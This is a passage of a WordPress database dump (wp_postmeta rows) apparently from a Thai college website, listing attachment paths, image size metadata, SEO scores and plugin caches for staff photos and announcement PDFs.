:0:{}}}'),
(9484, 4193, '_edit_lock', '1636341232:14'),
(9485, 4193, '_edit_last', '14'),
(9486, 4194, '_wp_attached_file', '2018/10/ดร.ภูมิพัฒน์-แก้วมูล.jpg'),
(9487, 4194, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:388;s:6:\"height\";i:472;s:4:\"file\";s:68:\"2018/10/ดร.ภูมิพัฒน์-แก้วมูล.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:68:\"ดร.ภูมิพัฒน์-แก้วมูล-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:68:\"ดร.ภูมิพัฒน์-แก้วมูล-247x300.jpg\";s:5:\"width\";i:247;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:68:\"ดร.ภูมิพัฒน์-แก้วมูล-247x300.jpg\";s:5:\"width\";i:247;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9488, 4193, '_thumbnail_id', '12156'),
(9492, 4193, '_hide_featured', NULL),
(9493, 4193, '_yoast_wpseo_content_score', '90'),
(9494, 4193, '_yoast_wpseo_primary_category', ''),
(9495, 4193, '_wpas_done_all', '1'),
(9498, 645, '_yoast_wpseo_content_score', '90'),
(9499, 645, '_wp_old_slug', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2'),
(9500, 645, '_yoast_wpseo_primary_category', ''),
(9501, 924, '_yoast_wpseo_primary_category', ''),
(9504, 649, '_wp_old_slug', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%9c%e0%b8%99'),
(9509, 4193, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575702414;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3988;}i:1;a:1:{s:2:\"id\";i:6054;}i:2;a:1:{s:2:\"id\";i:5301;}}}}'),
(9510, 4199, '_edit_lock', '1541140694:3'),
(9511, 4199, '_edit_last', '3'),
(9512, 4200, '_wp_attached_file', '2018/11/45147766_700139260362265_8019026751373967360_o.jpg'),
(9513, 4200, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/11/45147766_700139260362265_8019026751373967360_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"45147766_700139260362265_8019026751373967360_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"45147766_700139260362265_8019026751373967360_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"45147766_700139260362265_8019026751373967360_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"45147766_700139260362265_8019026751373967360_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"45147766_700139260362265_8019026751373967360_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9514, 4199, '_thumbnail_id', '4200'),
(9518, 4199, '_hide_featured', NULL),
(9519, 4199, '_yoast_wpseo_content_score', '30'),
(9520, 4199, '_yoast_wpseo_primary_category', '31'),
(9521, 4199, '_wpas_done_all', '1'),
(9522, 4203, '_wp_attached_file', '2018/11/2-11-2561-13-32-44.jpg'),
(9523, 4203, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:820;s:6:\"height\";i:588;s:4:\"file\";s:30:\"2018/11/2-11-2561-13-32-44.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-32-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-32-44-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-32-44-768x551.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-32-44-400x287.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9524, 4206, '_wp_attached_file', '2018/10/2-11-2561-13-38-39.jpg'),
(9525, 4206, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:253;s:6:\"height\";i:320;s:4:\"file\";s:30:\"2018/10/2-11-2561-13-38-39.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(9530, 4209, '_tablepress_table_options', '{\"last_editor\":1,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(9531, 4209, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1,1,1]}'),
(9533, 4214, '_wp_attached_file', '2018/11/Yuttana-Academic-Works.pdf'),
(9534, 2046, '_yoast_wpseo_content_score', '30'),
(9535, 4199, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575082824;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5172;}i:1;a:1:{s:2:\"id\";i:4739;}i:2;a:1:{s:2:\"id\";i:5900;}}}}'),
(9536, 4232, '_edit_lock', '1541403544:3'),
(9537, 4232, '_edit_last', '3'),
(9538, 4232, '_hide_featured', NULL),
(9539, 4232, '_yoast_wpseo_content_score', '30'),
(9540, 4234, '_edit_lock', '1541407670:3'),
(9541, 4234, '_edit_last', '3'),
(9542, 4235, '_wp_attached_file', '2018/11/ประกาศ-การรับนักเรียนชั้นมัธยมศึกษาปีที่-3-ประจำปีการศึกษา-2562.pdf'),
(9543, 4236, '_wp_attached_file', '2018/11/ประกาศ-การรับนักเรียนชั้นมัธยมศึกษาปีที่-3-ประจำปีการศึกษา-2562-1.pdf'),
(9544, 4237, '_wp_attached_file', '2018/11/ประกาศ-การรับนักเรียนชั้นมัธยมศึกษาปีที่-3-ประจำปีการศึกษา-2562-2.pdf'),
(9548, 4234, '_hide_featured', NULL),
(9549, 4234, '_yoast_wpseo_content_score', '60'),
(9550, 4234, '_yoast_wpseo_primary_category', '3'),
(9551, 4234, '_wpas_done_all', '1'),
(9552, 4234, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575733440;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4830;}i:1;a:1:{s:2:\"id\";i:4826;}i:2;a:1:{s:2:\"id\";i:6308;}}}}'),
(9553, 4240, '_edit_lock', '1541557354:3'),
(9554, 4240, '_edit_last', '3'),
(9555, 4241, '_wp_attached_file', '2018/11/dhcppc724634A82_000145.pdf'),
(9559, 4240, '_hide_featured', NULL),
(9560, 4240, '_yoast_wpseo_content_score', '30'),
(9561, 4240, '_yoast_wpseo_primary_category', '3'),
(9562, 4240, '_wpas_done_all', '1'),
(9563, 4240, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574912244;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(9564, 4244, '_wp_attached_file', '2018/11/ประกาศรายชื่อผู้มีสิทธิ์สอบ-ครูอัตราจ้าง.pdf'),
(9574, 4249, '_wp_attached_file', '2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง-1.jpg'),
(9575, 4249, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:220;s:6:\"height\";i:264;s:4:\"file\";s:100:\"2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:100:\"ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9578, 926, '_yoast_wpseo_content_score', '60'),
(9579, 926, '_wp_old_slug', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84-2'),
(9580, 4252, '_wp_attached_file', '2018/01/6-2-2561-9-55-14-1-e1541561916832.jpg'),
(9581, 4252, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:154;s:6:\"height\";i:197;s:4:\"file\";s:45:\"2018/01/6-2-2561-9-55-14-1-e1541561916832.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-55-14-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9582, 4252, '_wp_attachment_backup_sizes', 'a:3:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:154;s:6:\"height\";i:197;s:4:\"file\";s:22:\"6-2-2561-9-55-14-1.jpg\";}s:18:\"full-1541561852306\";a:3:{s:5:\"width\";i:154;s:6:\"height\";i:197;s:4:\"file\";s:37:\"6-2-2561-9-55-14-1-e1541561823846.jpg\";}s:18:\"full-1541561916832\";a:3:{s:5:\"width\";i:154;s:6:\"height\";i:197;s:4:\"file\";s:37:\"6-2-2561-9-55-14-1-e1541561852306.jpg\";}}'),
(9585, 924, '_yoast_wpseo_content_score', '60'),
(9586, 924, '_wp_old_slug', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2-2'),
(9587, 4255, '_wp_attached_file', '2018/01/555-2-e1541562626632.jpg'),
(9588, 4255, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:220;s:6:\"height\";i:215;s:4:\"file\";s:32:\"2018/01/555-2-e1541562626632.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"รองอานุภาพ555-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"รองอานุภาพ555-2-300x293.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:47:\"รองอานุภาพ555-2-307x300.jpg\";s:5:\"width\";i:307;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9589, 4255, '_wp_attachment_backup_sizes', 'a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:506;s:6:\"height\";i:495;s:4:\"file\";s:9:\"555-2.jpg\";}}'),
(9592, 922, '_yoast_wpseo_content_score', '60'),
(9593, 922, '_wp_old_slug', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab-2'),
(9594, 4257, '_wp_attached_file', '2018/01/6-2-2561-9-56-49-1-e1541562820786.jpg'),
(9595, 4257, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:150;s:6:\"height\";i:200;s:4:\"file\";s:45:\"2018/01/6-2-2561-9-56-49-1-e1541562820786.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-56-49-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9596, 4257, '_wp_attachment_backup_sizes', 'a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:150;s:6:\"height\";i:200;s:4:\"file\";s:22:\"6-2-2561-9-56-49-1.jpg\";}}'),
(9599, 920, '_yoast_wpseo_content_score', '60'),
(9600, 4260, '_thumbnail_id', '4261'),
(9601, 4260, '_yoast_wpseo_primary_category', '44'),
(9602, 4260, '_edit_lock', '1541563396:3'),
(9603, 4260, '_edit_last', '3'),
(9604, 4261, '_wp_attached_file', '2018/11/2-11-2561-13-38-39-e1541563460730.jpg'),
(9605, 4261, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:220;s:6:\"height\";i:278;s:4:\"file\";s:45:\"2018/11/2-11-2561-13-38-39-e1541563460730.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9606, 4261, '_wp_attachment_backup_sizes', 'a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:253;s:6:\"height\";i:320;s:4:\"file\";s:22:\"2-11-2561-13-38-39.jpg\";}}'),
(9610, 4260, '_hide_featured', NULL),
(9611, 4260, '_yoast_wpseo_content_score', '60'),
(9612, 4260, '_wpas_done_all', '1'),
(9617, 4260, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575615824;s:7:\"payload\";a:0:{}}}'),
(9618, 4265, '_edit_lock', '1541660974:3'),
(9619, 4265, '_edit_last', '3'),
(9620, 4266, '_wp_attached_file', '2018/11/45491621_703270023382522_3554106061872955392_o.jpg'),
(9621, 4266, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/11/45491621_703270023382522_3554106061872955392_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"45491621_703270023382522_3554106061872955392_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"45491621_703270023382522_3554106061872955392_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"45491621_703270023382522_3554106061872955392_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"45491621_703270023382522_3554106061872955392_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"45491621_703270023382522_3554106061872955392_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9622, 4265, '_thumbnail_id', '4266'),
(9626, 4265, '_hide_featured', NULL),
(9627, 4265, '_yoast_wpseo_content_score', '30'),
(9628, 4265, '_yoast_wpseo_primary_category', '31'),
(9629, 4265, '_wpas_done_all', '1'),
(9630, 4265, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575740173;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6308;}i:1;a:1:{s:2:\"id\";i:5979;}i:2;a:1:{s:2:\"id\";i:5900;}}}}'),
(9633, 4269, '_edit_lock', '1541663694:3'),
(9634, 4269, '_edit_last', '3'),
(9635, 4270, '_wp_attached_file', '2018/11/ประกาศ-ครูอัตราจ้าง.pdf'),
(9639, 4269, '_hide_featured', NULL),
(9640, 4269, '_yoast_wpseo_content_score', '60'),
(9641, 4269, '_yoast_wpseo_primary_category', '3'),
(9642, 4269, '_wpas_done_all', '1'),
(9643, 4269, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575285271;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(9646, 632, 'ml-slider_inherit_image_title', ''),
(9647, 632, 'ml-slider_inherit_image_caption', ''),
(9648, 632, 'ml-slider_inherit_image_alt', ''),
(9654, 4275, '_wp_attached_file', '2018/11/Asset-2@4x.png'),
(9655, 4275, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2269;s:6:\"height\";i:436;s:4:\"file\";s:22:\"2018/11/Asset-2@4x.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Asset-2@4x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Asset-2@4x-300x58.png\";s:5:\"width\";i:300;s:6:\"height\";i:58;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Asset-2@4x-768x148.png\";s:5:\"width\";i:768;s:6:\"height\";i:148;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Asset-2@4x-1024x197.png\";s:5:\"width\";i:1024;s:6:\"height\";i:197;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"Asset-2@4x-400x77.png\";s:5:\"width\";i:400;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9658, 4277, '_wp_attached_file', '2018/11/AVT-Banner.png'),
(9659, 4277, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2363;s:6:\"height\";i:438;s:4:\"file\";s:22:\"2018/11/AVT-Banner.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"AVT-Banner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"AVT-Banner-300x56.png\";s:5:\"width\";i:300;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"AVT-Banner-768x142.png\";s:5:\"width\";i:768;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"AVT-Banner-1024x190.png\";s:5:\"width\";i:1024;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"AVT-Banner-400x74.png\";s:5:\"width\";i:400;s:6:\"height\";i:74;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9665, 4280, '_edit_lock', '1639827061:1'),
(9666, 4280, '_edit_last', '1'),
(9667, 4280, '_hide_featured', NULL),
(9668, 4280, '_yoast_wpseo_content_score', '30'),
(9669, 4282, '_wp_attached_file', '2018/11/ประกาศ-อวท-โครงการธรรมะสอนใจ-01.png'),
